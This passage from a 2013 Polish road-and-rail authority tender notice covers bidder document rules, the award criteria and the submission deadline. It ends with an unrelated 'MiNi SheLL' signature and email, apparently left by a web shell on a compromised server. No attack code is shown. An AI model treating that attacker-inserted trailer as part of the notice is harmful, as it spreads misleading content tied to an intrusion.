d)Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w punkcie dotyczącym dokumentów podmiotów zagranicznych, zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem -wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
e)W przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
f)W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach, których Wykonawca polega na zasadach określonych w art. 26 ust. 2b PZP, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
g)Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych (jeśli dotyczy) innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (oryginał) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
h)Dokument, z którego wynika upoważnienie osoby osób do podpisania oferty w imieniu Wykonawcy lub pełnomocnictwo do reprezentowania Wykonawcy składa się w formie oryginału lub kopii poświadczonej przez notariusza, o ile nie wynika ono z innych dokumentów załączonych do oferty przez Wykonawcę. 
i)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w myśl art. 23 PZP -należy dostarczyć pełnomocnictwo do reprezentowania wszystkich Wykonawców. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia. Zamawiający dopuszcza złożenie przedmiotowego dokumentu w formie oryginału lub kopii poświadczonej przez notariusza,
b)dokumenty składane w zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, dotyczące Wykonawców wspólnie ubiegających się o udzielenie zamówienia winien złożyć każdy z Wykonawców wspólnie ubiegających się o zamówienie,
c)informację o przynależności do tej samej do grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 PZP składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>w zakresie przewidzianym w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www,dsdik.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląska Służba Dróg i Kolei we Wrocławiu, 50-4256 Wrocław, ul. Krakowska 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2013 godzina 10:00, miejsce: w siedzibie Zamawiającego we wrocławiu, przy ul. Krakowskiej 28, Kancelaria 
( parter budynku)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com